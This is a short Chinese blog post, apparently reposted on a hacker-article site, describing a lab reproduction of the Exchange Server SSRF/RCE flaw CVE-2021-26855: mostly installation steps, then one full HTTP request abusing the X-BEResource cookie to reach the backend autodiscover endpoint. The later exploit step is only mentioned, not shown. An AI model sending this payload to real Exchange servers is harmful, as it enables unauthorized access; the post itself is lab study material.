记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CVE-2021-26855 Exchange Server RCE 复现

2021-03-12 20:58

一、环境搭建

虚拟机配置 4核心16G 120SSD

1.1 安装AD 域控

参考:

https://blog.csdn.net/zhaowei198311/article/details/107391577


然后下载Exchange

https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=102114  然后下载.NET4.8 

https://docs.microsoft.com/zh-cn/exchange/plan-and-deploy/prerequisites?view=exchserver-2016


下载C++ 依赖包

https://www.microsoft.com/en-us/download/details.aspx?id=30679

有个坑。就是安装Visual C++ Redistributable Packages for Visual Studio 2013

记得下载的时候选择英文。。中文的会检测的时候一直通不过

然后安装Exchange 

然后需要安装一个补丁。

http://www.catalog.update.microsoft.com/Search.aspx?q=KB3206632

请选择你的机器型号。进行下载

然后重启之后。继续安装Exchange


二:安装完成访问页面
默认安装完成后会有体验天数,由于楼主是购买了微软的license所以就先激活了
邮箱管理登录页面:https://localhost/ecp
个人邮箱用户登录页面:https://localhost/owa
当然安装完成后也支持POP3,IMAP服务 详情在服务里面启动就可以进行配置



测试一下SSRF

POST /ecp/fewi.js HTTP/1.1
Host: mail.btwaf.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=WIN-VT2P6K94J9J/autodiscover/autodiscover.xml?a=~1942062522;
Content-Type: text/xml
Content-Length: 412


            <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
                <Request>
                <EMailAddress>test2@btwaf.cn</EMailAddress>
                <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
                </Request>
            </Autodiscover>
        

exp 执行一下

获取system权限


知识来源: https://www.o2oxy.cn/3169.html

阅读:322933 | 评论:1 | 标签:CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2021-26855 Exchange Server RCE 复现”共有1条留言

  1. zaixiankefu @2021-03-16 15:11 回复

    老哥。你用的exp可以分享一下吗,看看不同代码的区别

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁

本页关键词 💎